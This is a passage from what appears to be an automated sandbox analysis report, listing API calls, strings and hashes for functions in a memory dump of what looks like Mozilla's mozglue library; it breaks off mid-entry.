                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 2538299546-0
                                                                  • Opcode ID: 5549ce61e280e557033f0092741c552f0b76fee2569ecdf105df437a4a3b64d1
                                                                  • Instruction ID: 1b1f09ae927dd21d1620f2117215ca31f613463fab499accc14eee406c5c3968
                                                                  • Opcode Fuzzy Hash: 5549ce61e280e557033f0092741c552f0b76fee2569ecdf105df437a4a3b64d1
                                                                  • Instruction Fuzzy Hash: BE11C4B1904325ABE710AF76DC44BABBEE8EF55354F049529F848E7700E7709844CBE2
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C9B3DEF), ref: 6C9F0D71
                                                                  • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C9B3DEF), ref: 6C9F0D84
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C9B3DEF), ref: 6C9F0DAF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Free$Alloc
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 1852963964-2186867486
                                                                  • Opcode ID: 6231797b6ee7fce6b30bcd761934cc1b61829c04fe40735e3977a8cef28dec20
                                                                  • Instruction ID: fc073f7c0a7a4268c2e38e971dcc367218929c8a4fcb9c610b25ed8c91dc9423
                                                                  • Opcode Fuzzy Hash: 6231797b6ee7fce6b30bcd761934cc1b61829c04fe40735e3977a8cef28dec20
                                                                  • Instruction Fuzzy Hash: 0DF02E313907A923E734116A1C1AF6A265F67C2B25F30B175F76CDE9C0DA90E44747B8
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CA075C4,?), ref: 6CA0762B
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07644
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA0765A
                                                                  • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07663
                                                                  • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CA074D7,6CA115FC,?,?,?), ref: 6CA07677
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 418114769-0
                                                                  • Opcode ID: 7877b923b2f4a739f6800473b8320c5ca9a8e4a5848f826b7b46b2c86543eeee
                                                                  • Instruction ID: e6d5c03e43f1583daf31fc7473a1f74dd54196d6b7e386f32b46a61d6f84ebc5
                                                                  • Opcode Fuzzy Hash: 7877b923b2f4a739f6800473b8320c5ca9a8e4a5848f826b7b46b2c86543eeee
                                                                  • Instruction Fuzzy Hash: D6F0C271E10B46ABD7008F22DC98676B779FFEA259F218316F90883601E7B0A5D18BD1
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 6CA11800
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                    • Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                  • String ID: Details$name${marker.name} - {marker.data.name}
                                                                  • API String ID: 46770647-1733325692
                                                                  • Opcode ID: 90d73a3c6efe7ba00aa64cc39603c8fcf34608db7f2da7e27c98358cb417e632
                                                                  • Instruction ID: cbc56638dbae157e2e7fd647aca32d7071c39e27497940f92b253f348083ccac
                                                                  • Opcode Fuzzy Hash: 90d73a3c6efe7ba00aa64cc39603c8fcf34608db7f2da7e27c98358cb417e632
                                                                  • Instruction Fuzzy Hash: 667136B0A007469FCB04DF28D8547AABBB1FF69304F04466DD8199BB41D730EA99CBE1
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010,00000000,?,?,6CA1AB1F), ref: 6CA1B1F2
                                                                  • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010,00000000,?), ref: 6CA1B1FF
                                                                  • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CA1B0A6,6CA1B0A6,?,6CA1AF67,?,00000010,?,6CA1AF67,?,00000010), ref: 6CA1B25F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$Xlength_error@std@@
                                                                  • String ID: map/set<T> too long
                                                                  • API String ID: 1922495194-1285458680
                                                                  • Opcode ID: e80de90d1345ef51423b8c7b5405cadf871d02b060e583a6b654ce2f3d7b1534
                                                                  • Instruction ID: 19ee55be735cdb6b6735ce50c445c7abaa5e63e896261304292f10bf872090a0
                                                                  • Opcode Fuzzy Hash: e80de90d1345ef51423b8c7b5405cadf871d02b060e583a6b654ce2f3d7b1534
                                                                  • Instruction Fuzzy Hash: 95619DB46082458FD701CF19D980A9ABBF1FF4A328F19C299D8599FB52C331EC85CB91
                                                                  APIs
                                                                    • Part of subcall function 6C9ECBE8: GetCurrentProcess.KERNEL32(?,6C9B31A7), ref: 6C9ECBF1
                                                                    • Part of subcall function 6C9ECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9B31A7), ref: 6C9ECBFA
                                                                  • EnterCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD4F2
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD50B
                                                                    • Part of subcall function 6C9BCFE0: EnterCriticalSection.KERNEL32(6CA3E784), ref: 6C9BCFF6
                                                                    • Part of subcall function 6C9BCFE0: LeaveCriticalSection.KERNEL32(6CA3E784), ref: 6C9BD026
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD52E
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9DD690
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C9ED1C5), ref: 6C9DD751
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                  • String ID: MOZ_CRASH()
                                                                  • API String ID: 3805649505-2608361144
                                                                  • Opcode ID: fb5af6a7d0f98cbf0c32ae2b79c873c011f35452786ba3141f9476f5a39b8753
                                                                  • Instruction ID: b9d987a83adc0d71865b011247b9fcafa4dab7b01e02c7fa1cfaa236c808266a
                                                                  • Opcode Fuzzy Hash: fb5af6a7d0f98cbf0c32ae2b79c873c011f35452786ba3141f9476f5a39b8753
                                                                  • Instruction Fuzzy Hash: 7A51E571A04B028FD368CF28C4A461AB7E5EB99704F558A2EE599D7B84D730E840CF91
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 3732870572-2661126502
                                                                  • Opcode ID: 03c52101ccc5f82c7f6d9d9f983cd9537308809bd6e8e4014f08f69490d2af08
                                                                  • Instruction ID: 13f0469e6e4fc546a93713d37ac42e18f7724337feca5d81b524a32770df0695
                                                                  • Opcode Fuzzy Hash: 03c52101ccc5f82c7f6d9d9f983cd9537308809bd6e8e4014f08f69490d2af08
                                                                  • Instruction Fuzzy Hash: 5B416871F087189FCB08DF78E85119EBBE5EFA5388F14862EE84997B41EB309885C741
                                                                  APIs
                                                                  • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6CA2985D
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CA2987D
                                                                  • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6CA298DE
                                                                  Strings
                                                                  • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6CA298D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                                                  • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                                                  • API String ID: 1778083764-3290996778
                                                                  • Opcode ID: 30899042abb43805b73675b26b0a6189a9812ecaff08f17cb4b5c46f2df81890
                                                                  • Instruction ID: ba35fac7c28661d4ac7f681d6a8b74f5ffdde1b3e7555a0b75016ae22ebb96b8
                                                                  • Opcode Fuzzy Hash: 30899042abb43805b73675b26b0a6189a9812ecaff08f17cb4b5c46f2df81890
                                                                  • Instruction Fuzzy Hash: AE313571A002189FDF14AF59DC149EE77B9DFA8718F04842DEA0ADBB40CB349905CBE1
                                                                  APIs
                                                                  • __aulldiv.LIBCMT ref: 6CA04721
                                                                    • Part of subcall function 6C9B4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C9F3EBD,00000017,?,00000000,?,6C9F3EBD,?,?,6C9B42D2), ref: 6C9B4444
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv__stdio_common_vsprintf
                                                                  • String ID: -%llu$.$profiler-paused
                                                                  • API String ID: 680628322-2661126502
                                                                  • Opcode ID: d6cd85eb84bd433002725bc1c14f1c9cc2d91fd0ccd38e0e6bc64ddd7ce72198
                                                                  • Instruction ID: ddca7993d8361e93819fdb26fbdd4ca46e4956023a32a48e1eafe525ade2ac51
                                                                  • Opcode Fuzzy Hash: d6cd85eb84bd433002725bc1c14f1c9cc2d91fd0ccd38e0e6bc64ddd7ce72198
                                                                  • Instruction Fuzzy Hash: 2D314A71F043184BCB0CCF6CE89129EBBE6ABA8318F18813DE8059B741E774D8448B90
                                                                  APIs
                                                                    • Part of subcall function 6C9B4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3EBD,6C9F3EBD,00000000), ref: 6C9B42A9
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6CA0B127), ref: 6CA0B463
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA0B4C9
                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6CA0B4E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _getpidstrlenstrncmptolower
                                                                  • String ID: pid:
                                                                  • API String ID: 1720406129-3403741246
                                                                  • Opcode ID: 364a477578e27e08ed277c7ccc15e435df91a99824a26dfb729f604b42425acd
                                                                  • Instruction ID: b43d32309bb1fcb14cb9fd9cb2800969cbaa09607f8275892857c5d0f1516694
                                                                  • Opcode Fuzzy Hash: 364a477578e27e08ed277c7ccc15e435df91a99824a26dfb729f604b42425acd
                                                                  • Instruction Fuzzy Hash: E3312631B012159BCB10DFA9F980AEEB775FF0534CF180629D802A7A41D732E985CBA1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9FE577
                                                                  • AcquireSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FE584
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6CA3F4B8), ref: 6C9FE5DE
                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C9FE8A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                                                  • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                  • API String ID: 1483687287-53385798
                                                                  • Opcode ID: 8180e7768235ebc36f1010edfb6f041773aa200c478f88b8418f9129eca83d83
                                                                  • Instruction ID: 83e1efda8eac95fd5d7c1cc836a55ce98b6e13578eaf6955e8843d2a4be1951b
                                                                  • Opcode Fuzzy Hash: 8180e7768235ebc36f1010edfb6f041773aa200c478f88b8418f9129eca83d83
                                                                  • Instruction Fuzzy Hash: 8411CE31610359DFCB149F18CC58A69BBB8FB89728F00865DF89AC7650C770A846CB91
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA00CD5
                                                                    • Part of subcall function 6C9EF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C9EF9A7
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CA00D40
                                                                  • free.MOZGLUE ref: 6CA00DCB
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  • free.MOZGLUE ref: 6CA00DDD
                                                                  • free.MOZGLUE ref: 6CA00DF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                                                  • String ID:
                                                                  • API String ID: 4069420150-0
                                                                  • Opcode ID: 00bf111cf1c628ae21a94c66fa03c7ac6117619ddd5f90ba89e6beab9f26cce5
                                                                  • Instruction ID: 04a4a3f58a32366d9ebe0a7bc1b46d0e6db2da516694d2899d535d641ee9ea45
                                                                  • Opcode Fuzzy Hash: 00bf111cf1c628ae21a94c66fa03c7ac6117619ddd5f90ba89e6beab9f26cce5
                                                                  • Instruction Fuzzy Hash: ED414975A087809BD320DF29C08079EFBE5BFD9758F158A2EE8D887710D770A484CB92
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F0838
                                                                  • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C9F084C
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9F08AF
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9F08BD
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9F08D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset
                                                                  • String ID:
                                                                  • API String ID: 837921583-0
                                                                  • Opcode ID: c2dee3af56a84f042b914f71a8e739f616754a93fbc43490ffd6fa75ffc01aa0
                                                                  • Instruction ID: d7f61ab4afd45d5d92e4941b4e723c6c05d2139cdfd1775557f77defecf41ead
                                                                  • Opcode Fuzzy Hash: c2dee3af56a84f042b914f71a8e739f616754a93fbc43490ffd6fa75ffc01aa0
                                                                  • Instruction Fuzzy Hash: 8B21C130B0534E9BEB04CF699C58BAA737DBF45708F544568D51DE7A40DB32E8068BD0
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CDA4
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                    • Part of subcall function 6CA0D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6CA0CDBA,00100000,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D158
                                                                    • Part of subcall function 6CA0D130: InitializeConditionVariable.KERNEL32(00000098,?,6CA0CDBA,00100000,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D177
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CDC4
                                                                    • Part of subcall function 6CA07480: ReleaseSRWLockExclusive.KERNEL32(?,6CA115FC,?,?,?,?,6CA115FC,?), ref: 6CA074EB
                                                                  • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0CECC
                                                                    • Part of subcall function 6C9CCA10: mozalloc_abort.MOZGLUE(?), ref: 6C9CCAA2
                                                                    • Part of subcall function 6C9FCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6CA0CEEA,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000), ref: 6C9FCB57
                                                                    • Part of subcall function 6C9FCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C9FCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6CA0CEEA,?,?), ref: 6C9FCBAF
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C9FDA31,00100000,?,?,00000000,?), ref: 6CA0D058
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                  • String ID:
                                                                  • API String ID: 861561044-0
                                                                  • Opcode ID: e6b38bb1d0407c13ba12abbbf231b5293e790e4dc96299bad09ad16af909bf89
                                                                  • Instruction ID: 65e54324bf4ac42dc9caa46e0732946fc5d4c6135d5ddaae4a74ffeca9add462
                                                                  • Opcode Fuzzy Hash: e6b38bb1d0407c13ba12abbbf231b5293e790e4dc96299bad09ad16af909bf89
                                                                  • Instruction Fuzzy Hash: 07D19F71B04B069FD708CF28D480799F7E1BF98348F05862DD85987712EB31E9A5CB92
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9C17B2
                                                                  • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C9C18EE
                                                                  • free.MOZGLUE(?), ref: 6C9C1911
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9C194C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                  • String ID:
                                                                  • API String ID: 3725304770-0
                                                                  • Opcode ID: 28d351d31fe3d6d151821d03fd677d4a8afa90cc797d352383b32db9d3a9f7bf
